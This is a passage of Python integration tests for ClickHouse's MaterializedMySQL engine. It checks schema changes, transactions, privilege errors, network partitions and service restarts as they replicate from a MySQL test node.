mysql_node.query("INSERT INTO test_database_alter_drop.test_table_2 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_drop.test_table_2 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_alter_drop")
mysql_node.query("DROP DATABASE test_database_alter_drop")
def alter_rename_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
mysql_node.query("CREATE DATABASE test_database_alter_rename DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_1 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_1 RENAME COLUMN rename_column TO new_column_name")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_2 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nrename_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_2 RENAME COLUMN rename_column TO new_column_name")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_rename.test_table_2 VALUES(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_rename.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\n3\t4\n5\t6\n7\t8\n9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_alter_rename")
mysql_node.query("DROP DATABASE test_database_alter_rename")
def alter_modify_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
mysql_node.query("CREATE DATABASE test_database_alter_modify DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_1 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_1 MODIFY COLUMN modify_column INT")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_modify ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_modify', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_modify" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_2 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT FIRST")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"modify_column\tNullable(Int32)\t\t\t\t\t\nid\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT AFTER id")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_modify.test_table_2 VALUES(1, 2), (3, NULL)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_modify.test_table_2 ORDER BY id FORMAT TSV", "1\t2\n3\t\\N\n")
clickhouse_node.query("DROP DATABASE test_database_alter_modify")
mysql_node.query("DROP DATABASE test_database_alter_modify")
# TODO: need ClickHouse support ALTER TABLE table_name ADD COLUMN column_name, RENAME COLUMN column_name TO new_column_name;
# def test_mysql_alter_change_column_for_materialized_mysql_database(started_cluster):
# pass
def alter_rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
mysql_node.query("CREATE DATABASE test_database_rename_table DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_3")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename_table ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename_table', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename_table" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_3 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_1\ntest_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_4")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\ntest_table_4\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_4 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_rename_table.test_table_4 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_rename_table.test_table_4 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_rename_table")
mysql_node.query("DROP DATABASE test_database_rename_table")
def query_event_with_empty_transaction(clickhouse_node, mysql_node, service_name):
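# Verify that empty transactions (an empty GTID BEGIN/COMMIT pair and a comment-wrapped
# begin/commit) are skipped without breaking replication of the following insert.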
mysql_node.query("DROP DATABASE IF EXISTS test_database_event")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_event")
mysql_node.query("CREATE DATABASE test_database_event")
mysql_node.query("RESET MASTER")
mysql_node.query("CREATE TABLE test_database_event.t1(a INT NOT NULL PRIMARY KEY, b VARCHAR(255) DEFAULT 'BEGIN')")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(1)")
clickhouse_node.query(
"CREATE DATABASE test_database_event ENGINE = MaterializedMySQL('{}:3306', 'test_database_event', 'root', 'clickhouse')".format(
service_name))
# Reject one empty GTID QUERY event with 'BEGIN' and 'COMMIT'
mysql_cursor = mysql_node.alloc_connection().cursor(pymysql.cursors.DictCursor)
mysql_cursor.execute("SHOW MASTER STATUS")
(uuid, seqs) = mysql_cursor.fetchall()[0]["Executed_Gtid_Set"].split(":")
(seq_begin, seq_end) = seqs.split("-")
next_gtid = uuid + ":" + str(int(seq_end) + 1)
mysql_node.query("SET gtid_next='" + next_gtid + "'")
mysql_node.query("BEGIN")
mysql_node.query("COMMIT")
mysql_node.query("SET gtid_next='AUTOMATIC'")
# Reject one 'BEGIN' QUERY event and 'COMMIT' XID event.
mysql_node.query("/* start */ begin /* end */")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(2)")
mysql_node.query("/* start */ commit /* end */")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_event FORMAT TSV", "t1\n")
check_query(clickhouse_node, "SELECT * FROM test_database_event.t1 ORDER BY a FORMAT TSV", "1\tBEGIN\n2\tBEGIN\n")
clickhouse_node.query("DROP DATABASE test_database_event")
mysql_node.query("DROP DATABASE test_database_event")
def select_without_columns(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS db")
clickhouse_node.query("DROP DATABASE IF EXISTS db")
mysql_node.query("CREATE DATABASE db")
mysql_node.query("CREATE TABLE db.t (a INT PRIMARY KEY, b INT)")
clickhouse_node.query(
"CREATE DATABASE db ENGINE = MaterializedMySQL('{}:3306', 'db', 'root', 'clickhouse') SETTINGS max_flush_data_time = 100000".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM db FORMAT TSV", "t\n")
clickhouse_node.query("SYSTEM STOP MERGES db.t")
clickhouse_node.query("CREATE VIEW v AS SELECT * FROM db.t")
mysql_node.query("INSERT INTO db.t VALUES (1, 1), (2, 2)")
mysql_node.query("DELETE FROM db.t WHERE a = 2;")
# We need to execute a DDL statement to flush the data buffer
mysql_node.query("CREATE TABLE db.temporary(a INT PRIMARY KEY, b INT)")
optimize_on_insert = clickhouse_node.query("SELECT value FROM system.settings WHERE name='optimize_on_insert'").strip()
if optimize_on_insert == "0":
res = ["3\n", "2\n", "2\n"]
else:
res = ["2\n", "2\n", "1\n"]
check_query(clickhouse_node, "SELECT count((_sign, _version)) FROM db.t FORMAT TSV", res[0])
assert clickhouse_node.query("SELECT count(_sign) FROM db.t FORMAT TSV") == res[1]
assert_eq_with_retry(clickhouse_node, "SELECT count(_version) FROM db.t", res[2].strip(), sleep_time=2, retry_count=3)
assert clickhouse_node.query("SELECT count() FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count(*) FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM (SELECT * FROM db.t) FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM v FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM merge('db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM remote('localhost', 'db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT _part FROM db.t FORMAT TSV") == "0_1_1_0\n"
assert clickhouse_node.query("SELECT _part FROM remote('localhost', 'db', 't') FORMAT TSV") == "0_1_1_0\n"
clickhouse_node.query("DROP VIEW v")
clickhouse_node.query("DROP DATABASE db")
mysql_node.query("DROP DATABASE db")
def insert_with_modify_binlog_checksum(clickhouse_node, mysql_node, service_name):
mysql_node.query("CREATE DATABASE test_checksum")
mysql_node.query("CREATE TABLE test_checksum.t (a INT PRIMARY KEY, b varchar(200))")
clickhouse_node.query("CREATE DATABASE test_checksum ENGINE = MaterializedMySQL('{}:3306', 'test_checksum', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_checksum FORMAT TSV", "t\n")
mysql_node.query("INSERT INTO test_checksum.t VALUES(1, '1111')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n")
mysql_node.query("SET GLOBAL binlog_checksum=NONE")
mysql_node.query("INSERT INTO test_checksum.t VALUES(2, '2222')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n")
mysql_node.query("SET GLOBAL binlog_checksum=CRC32")
mysql_node.query("INSERT INTO test_checksum.t VALUES(3, '3333')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n3\t3333\n")
clickhouse_node.query("DROP DATABASE test_checksum")
mysql_node.query("DROP DATABASE test_checksum")
def err_sync_user_privs_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("CREATE DATABASE priv_err_db DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE priv_err_db.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(1);")
mysql_node.create_min_priv_user("test", "123")
mysql_node.result("SHOW GRANTS FOR 'test'@'%';")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "1\n", 30, 5)
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(2);")
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "2\n")
clickhouse_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("REVOKE REPLICATION SLAVE ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE REPLICATION CLIENT, RELOAD ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DETACH DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
time.sleep(3)
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query("ATTACH DATABASE priv_err_db")
assert 'MySQL SYNC USER ACCESS ERR:' in str(exception.value)
assert "priv_err_db" not in clickhouse_node.query("SHOW DATABASES")
mysql_node.query("GRANT SELECT ON priv_err_db.* TO 'test'@'%'")
time.sleep(3)
clickhouse_node.query("ATTACH DATABASE priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
mysql_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("DROP USER 'test'@'%'")
def restore_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
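# Remove the PartitionManager rules that block traffic between the ClickHouse node and
# MySQL port 3306, then wait for the change to take effect.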
pm._check_instance(clickhouse_node)
pm._delete_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._delete_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def drop_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
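# Add PartitionManager rules that block traffic between the ClickHouse node and
# MySQL port 3306, then wait for the change to take effect.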
pm._check_instance(clickhouse_node)
pm._add_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._add_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def network_partition_test(clickhouse_node, mysql_node, service_name):
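# Simulate a network partition: while MySQL is unreachable replication stalls and creating
# a new MaterializedMySQL database fails; after restoring connectivity the existing
# database catches up and new databases can be created.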
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_network")
clickhouse_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("DROP DATABASE IF EXISTS test_database_network")
mysql_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("CREATE DATABASE test_database_network;")
mysql_node.query("CREATE TABLE test_database_network.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("CREATE DATABASE test;")
clickhouse_node.query(
"CREATE DATABASE test_database_network ENGINE = MaterializedMySQL('{}:3306', 'test_database_network', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with PartitionManager() as pm:
drop_instance_mysql_connections(clickhouse_node, pm)
mysql_node.query('INSERT INTO test_database_network.test_table VALUES(1)')
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
assert "Can't connect to MySQL server" in str(exception.value)
restore_instance_mysql_connections(clickhouse_node, pm)
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table FORMAT TSV", '1\n')
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_database_network FORMAT TSV", "test_table\n")
mysql_node.query("CREATE TABLE test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test FORMAT TSV", "test\n")
clickhouse_node.query("DROP DATABASE test_database_network")
clickhouse_node.query("DROP DATABASE test")
mysql_node.query("DROP DATABASE test_database_network")
mysql_node.query("DROP DATABASE test")
def mysql_kill_sync_thread_restore_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database;")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("DROP DATABASE IF EXISTS test_database;")
mysql_node.query("CREATE DATABASE test_database;")
mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database.test_table VALUES (1)")
mysql_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("CREATE DATABASE test_database_auto;")
mysql_node.query("CREATE TABLE test_database_auto.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (11)")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
clickhouse_node.query("CREATE DATABASE test_database_auto ENGINE = MaterializedMySQL('{}:3306', 'test_database_auto', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table FORMAT TSV", '11\n')
    # Once ClickHouse has dumped all of the historical data we can query it in ClickHouse,
    # but that does not mean the sync thread has already connected to MySQL.
    # So after ClickHouse can serve the data, insert some rows into MySQL to re-check that syncing succeeds.
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (22)")
mysql_node.query("INSERT INTO test_database.test_table VALUES (2)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n')
get_sync_id_query = "SELECT id FROM information_schema.processlist WHERE state LIKE '% has sent all binlog to % waiting for more updates%';"
result = mysql_node.query_and_get_data(get_sync_id_query)
assert len(result) > 0
for row in result:
query = "kill " + str(row[0]) + ";"
mysql_node.query(query)
with pytest.raises(QueryRuntimeException, match="Cannot read all data"):
# https://dev.mysql.com/doc/refman/5.7/en/kill.html
# When you use KILL, a thread-specific kill flag is set for the thread.
# In most cases, it might take some time for the thread to die because the kill flag is checked only at specific intervals.
for sleep_time in [1, 3, 5]:
time.sleep(sleep_time)
clickhouse_node.query("SELECT * FROM test_database.test_table")
clickhouse_node.query("DETACH DATABASE test_database")
clickhouse_node.query("ATTACH DATABASE test_database")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
mysql_node.query("INSERT INTO test_database.test_table VALUES (3)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n3\n')
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (33)")
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n33\n')
clickhouse_node.query("DROP DATABASE test_database")
clickhouse_node.query("DROP DATABASE test_database_auto")
mysql_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database_auto")
def mysql_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
mysql_node.query("CREATE DATABASE kill_mysql_while_insert")
mysql_node.query("CREATE TABLE kill_mysql_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_mysql_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_mysql_while_insert', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_mysql_while_insert FORMAT TSV", 'test\n')
try:
def insert(num):
for i in range(num):
query = "INSERT INTO kill_mysql_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(10000,))
t.start()
clickhouse_node.cluster.restart_service(service_name)
finally:
with pytest.raises(QueryRuntimeException) as exception:
time.sleep(2)
clickhouse_node.query("SELECT count() FROM kill_mysql_while_insert.test")
mysql_node.alloc_connection()
clickhouse_node.query("DETACH DATABASE kill_mysql_while_insert")
clickhouse_node.query("ATTACH DATABASE kill_mysql_while_insert")
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_mysql_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_mysql_while_insert.test", res)
mysql_node.query("DROP DATABASE kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE kill_mysql_while_insert")
def clickhouse_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_clickhouse_while_insert")
mysql_node.query("CREATE DATABASE kill_clickhouse_while_insert")
mysql_node.query("CREATE TABLE kill_clickhouse_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_clickhouse_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_clickhouse_while_insert', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_clickhouse_while_insert FORMAT TSV", 'test\n')
def insert(num):
for i in range(num):
query = "INSERT INTO kill_clickhouse_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(1000,))
t.start()
# TODO: add clickhouse_node.restart_clickhouse(20, kill=False) test
clickhouse_node.restart_clickhouse(20, kill=True)
t.join()
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_clickhouse_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_clickhouse_while_insert.test FORMAT TSV", res)
mysql_node.query("DROP DATABASE kill_clickhouse_while_insert")
clickhouse_node.query("DROP DATABASE kill_clickhouse_while_insert")
def utf8mb4_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
clickhouse_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
mysql_node.query("CREATE DATABASE utf8mb4_test")
mysql_node.query("CREATE TABLE utf8mb4_test.test (id INT(11) NOT NULL PRIMARY KEY, name VARCHAR(255)) ENGINE=InnoDB DEFAULT CHARACTER SET utf8mb4")
mysql_node.query("INSERT INTO utf8mb4_test.test VALUES(1, '🦄'),(2, '\u2601')")
clickhouse_node.query("CREATE DATABASE utf8mb4_test ENGINE = MaterializedMySQL('{}:3306', 'utf8mb4_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM utf8mb4_test FORMAT TSV", "test\n")
check_query(clickhouse_node, "SELECT id, name FROM utf8mb4_test.test ORDER BY id", "1\t\U0001F984\n2\t\u2601\n")
def system_parts_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_parts_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_parts_test")
mysql_node.query("CREATE DATABASE system_parts_test")
mysql_node.query("CREATE TABLE system_parts_test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO system_parts_test.test VALUES(1),(2),(3)")
def check_active_parts(num):
check_query(clickhouse_node, "SELECT count() FROM system.parts WHERE database = 'system_parts_test' AND table = 'test' AND active = 1", "{}\n".format(num))
clickhouse_node.query("CREATE DATABASE system_parts_test ENGINE = MaterializedMySQL('{}:3306', 'system_parts_test', 'root', 'clickhouse')".format(service_name))
check_active_parts(1)
mysql_node.query("INSERT INTO system_parts_test.test VALUES(4),(5),(6)")
check_active_parts(2)
clickhouse_node.query("OPTIMIZE TABLE system_parts_test.test")
check_active_parts(1)
def multi_table_update_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS multi_table_update")
clickhouse_node.query("DROP DATABASE IF EXISTS multi_table_update")
mysql_node.query("CREATE DATABASE multi_table_update")
mysql_node.query("CREATE TABLE multi_table_update.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("CREATE TABLE multi_table_update.b (id INT(11) NOT NULL PRIMARY KEY, othervalue VARCHAR(255))")
mysql_node.query("INSERT INTO multi_table_update.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO multi_table_update.b VALUES(1, 'bar')")
clickhouse_node.query("CREATE DATABASE multi_table_update ENGINE = MaterializedMySQL('{}:3306', 'multi_table_update', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM multi_table_update", "a\nb\n")
mysql_node.query("UPDATE multi_table_update.a, multi_table_update.b SET value='baz', othervalue='quux' where a.id=b.id")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.a", "1\tbaz\n")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.b", "1\tquux\n")
def system_tables_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_tables_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_tables_test")
mysql_node.query("CREATE DATABASE system_tables_test")
mysql_node.query("CREATE TABLE system_tables_test.test (id int NOT NULL PRIMARY KEY) ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE system_tables_test ENGINE = MaterializedMySQL('{}:3306', 'system_tables_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT partition_key, sorting_key, primary_key FROM system.tables WHERE database = 'system_tables_test' AND name = 'test'", "intDiv(id, 4294967)\tid\tid\n")
def materialize_with_column_comments_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
